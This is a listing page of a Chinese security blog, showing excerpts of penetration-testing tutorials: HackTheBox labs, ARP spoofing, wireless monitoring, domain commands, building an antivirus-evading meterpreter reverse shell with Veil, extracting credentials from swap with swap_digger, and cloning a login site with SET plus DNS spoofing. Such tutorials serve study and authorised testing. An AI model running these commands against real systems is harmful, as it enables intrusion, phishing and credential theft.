avatar
文章
319
标签
29
分类
0

Home
Archives
Tags
Categories
List
  • Music
  • Movie
Link
About
The Blog of Monoceros406
搜索
Home
Archives
Tags
Categories
List
  • Music
  • Movie
Link
About

The Blog of Monoceros406

HackTheBox初探
发表于2024-01-19|渗透测试
HackTheBox初探开始使用注册得科学上网,亲测还得用欧洲的,亚洲、中亚、美国的不行… 注册完就无所谓了。 注册后选择Starting Point,OpenVPN方式,下载vpn配置文件,然后连接: 1openvpn xxx.ovpn 直到Starting Point变绿,ifconfig发现多出来一块虚拟网卡tun0。 Meow1nmap -sV 10.129.42.107 23端口有telnet服务,尝试连接: 1telnet 10.129.42.107 尝试一些用户名,例如admin、administrator、root等,发现root账户可免密登录。 拿flag。 Fawn1nmap -sV 10.129.1.14 用了240秒…这速度不敢恭维。 21端口有ftp服务,尝试匿名anonymous登录发现成功,尝试下载: 123lsget flag.txtbye Dancing1nmap -sV 10.129.4.186 455端口显示microsoft-ds?意味着存在Samba服务,尝试连接并列出可用共享标志/开关: 1smbclient -U ro ...
Arjun入门
发表于2024-01-19|渗透测试
Arjun入门检测可能的传参变量,例如id等: 1arjun -u http://www.wangehacker.cn/sqli-labs/Less-1/ 可指定某种方式,如GET POST JSON XML等。 1arjun -u http://www.wangehacker.cn/sqli-labs/Less-1/ -m POST 多线程,默认2: 1arjun -u http://www.wangehacker.cn/sqli-labs/Less-1/ -t 10 自定义标头: 1arjun -u http://www.wangehacker.cn/sqli-labs/Less-1/ --headers "Accept=Language: en-US\nCookie: null" 控制查询块大小,可能最多达到500个参数而达到服务器最大URL长度限制,例如限制到250: 1arjun -u http://www.wangehacker.cn/sqli-labs/Less-1/ -c 250
Linux-C学习笔记
发表于2024-01-15|后端开发
Linux-C学习笔记内存管理动态内存管理12345678long *buffer;buffer=(long *)malloc(400);buffer=(long *)realloc(buffer,256);free(buffer);long *buffer;buffer=(long *)calloc(20,sizeof(long));free(buffer); 链表123456789101112131415161718192021222324252627282930313233343536373839#include <malloc.h>#include <stdio.h>#define LEN sizeof(struct student)typedef struct student{ int num,age; float score; struct student *next;}stu;int n;stu *create(void){ stu *head,*p1,*p2; n=0; p1=p ...
渗透测试常用网站
发表于2024-01-13|渗透测试
渗透测试常用网站17CE:https://www.17ce.com/crt.sh:https://crt.sh/ICP备案查询网:https://www.beianx.cn/IP查询网:https://www.ip138.com/IP反查绑定域名:https://dns.aizhan.com/VirusTotal:https://www.virustotal.com/WhatWeb:https://whatweb.net/爱站工具网:https://whois.aizhan.com/天眼查:https://www.tianyancha.com/微步在线情报社区:https://x.threatbook.com/云悉指纹:https://www.yunsee.cn/站长之家Whois:https://whois.chinaz.com/子成君二级域名挖掘:http://z.zcjun.com/NETCRAFT:https://www.netcraft.com/WebScan:https://www.webscan.cc/GTFOBins:https://gtfobins.github.io ...
中间人攻击
发表于2024-01-13|渗透测试
中间人攻击-ARP欺骗arpspoof语法格式: 12345arpspoof [options] host #-i interface 指定接口 #-t target 指定ARP欺骗的目标 #-r 双向欺骗 与-t一起使用 #host 指定拦截包的主机 通常网关 开启路由转发: 12echo 1 > /proc/sys/net/ipv4/ip_forwardcat /proc/sys/net/ipv4/ip_forward #输出1时成功开启 查看攻击主机和目标主机ARP缓存表,得到网关信息: 1arp 举例:攻击主机IP为192.168.29.134,MAC为00:0c:29:79:95:9e;目标主机IP为192.168.29.134,MAC为00:0c:29:6c:5d:69;网关IP为192.168.29.2,MAC为00:50:56:f1:40:cb。 分别对目标主机和网关实施ARP攻击: 12arpspoof -i eth0 -t 192.168.29.135 192.168.29.2arpspoof -i eth0 -t 192.168 ...
无线网络渗透基础原理
发表于2024-01-13|渗透测试
无线网络渗透基础设置监听模式2.4GHz WiFi网卡1sudo airmon-ng start wlan0 随后系统WiFi断开,wlan0接口改名为wlan0mon。 5GHz WiFi网卡仅支持芯片为RT3572和RTL8812AU的无线网卡,前者开启方式同2.4G网络,后者需要手动开启。 安装驱动: 1sudo apt-get install realtek-rt188xxau-dkms 查看无线网卡模式: 1iwconfig 发现为被管理模式,先停止无线网卡接口,设置为监听模式,再启动: 1234ip link set wlan0 downiwconfig wlan0 mode monitorip link set wlan0 upiwconfig #发现为监听模式 接口名还为wlan0 网络扫描Airodump-ng1airodump-ng wlan0mon 输出结果中每列参数: 列名 含义 BSSID 无线AP的物理地址。 PWR 信号水平,信号值越高离AP越近。为-1时标识客户端不在能监听到的范围内。当BSSID和PWR两列都为-1时,网卡驱动 ...
内网渗透命令大全
发表于2024-01-13|渗透测试
内网渗透命令大全域常用操作命令1234567891011121314151617181920212223242526272829303132net group /domain #获得所有域用户组列表net group qq_group /domain #显示域中qq_group组的成员net group qq_group /del /domain #删除域中qq_group组net group qq_group qq /del/domain #删除域内qq_group群组中的成员qqnet group qq_group /add /domain #增加域中的群组net group "domain admins" /domain #获得域管理员列表net group "enterprise admins" /domain #获得企业管理员列表net localgroup administrators /domain #获取域内置administrators组用户(enterprise admins、domain admins)net group & ...
Veil免杀入门
发表于2024-01-13|恶意代码
Veil免杀入门启动: 1veil 使用Evasion工具: 1use Evation 查看支持的攻击载荷: 1list 选择攻击载荷: 1use cs/meterpreter/rev_tcp.py 查看配置信息并配置: 12optionsset LHOST 192.168.29.134 生成攻击载荷: 1generate 生成可执行文件payload.exe。 还有另一种生成方式,直接使用命令行生成: 1veil -t Evasion -p cs/meterpreter/rev_tcp.py --ip 192.168.195.150 --port 4444 在MSF设置监听: 1234use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.29.134exploit 成功启动Meterpreter会话。
swap_digger使用方法
发表于2024-01-13|渗透测试
swap_digger使用方法在目标机器上下载并运行: 123wget https://raw.githubusercontent.com/sevagas/swap_digger/master/swap_digger.shchmod +x swap_digger.shsudo ./swap_digger.sh -vx -c -v输出冗余信息 -x获取扩展凭证 -c自动删除生成的工作目录。 功能有:自动提取swap并搜索Linux用户凭证、Web表单凭证、Web表单电子邮件、HTTP基本认证、WiFi SSID和密钥等。
SET常用方法
发表于2024-01-13|渗透测试
SET常用方法Web攻击向量依次选择选项1、2、3、1,即社会工程学攻击、Web攻击向量、证书获取攻击方式、使用Web模板,并输入目标主机IP地址,随后选择2,即克隆Google站点。 如果用户目录结构依赖/var/www/html目录,则需要复制/var/www/下所有文件到/var/www/html中,回车即可。 如果Apache等占用80端口,会提示关闭,y即可。 接下来需要使用Ettercap的dns_spoof插件实施ARP攻击和DNS欺骗。 修改/etc/ettercap/etter.dns,例如攻击主机IP为192.168.29.139,则添加: 1*    A    192.168.29.139 使用Ettercap发起ARP攻击,启动dns_spoof插件,实施DNS欺骗: 1ettercap -Tq -M arp:remote -P dns_spoof /192.168.29.139// /192.168.29.2// 当目标主机访问任何网站时 ...
1…212223…32
avatar
Monoceros406
Windows系统安全爱好者
文章
319
标签
29
分类
0
Follow Me
公告
哪里排版出锅了请告诉我QwQ QQ:1295625063
最新文章
Qt6开发入门-常用控件简介2025-05-11
Qt6开发入门-Qt框架综述2025-05-11
C++后端开发入门-环境配置与多线程编程2025-05-05
Qt6开发入门-环境配置与入门2025-05-05
差分隐私实践入门2025-05-03
标签
Win驱动开发 密码学 Python IoT 前端开发 PWN 漏洞复现 Misc 渗透测试 恶意代码 解题报告 AWD WinAPI GUI开发 算法 移动安全 后端开发 沙盒逃逸 逆向工程 取证 Web3 UEFI Web 编程语言 Win系统调试 OpenSSL 数学建模 其他 Win内核安全
归档
  • 五月 20255
  • 十二月 202413
  • 十一月 202412
  • 十月 202420
  • 九月 20243
  • 八月 20248
  • 七月 202413
  • 六月 20249
网站资讯
文章数目 :
319
已运行时间 :
本站访客数 :
本站总访问量 :
最后更新时间 :
©2020 - 2025 By Monoceros406
框架 Hexo|主题 Butterfly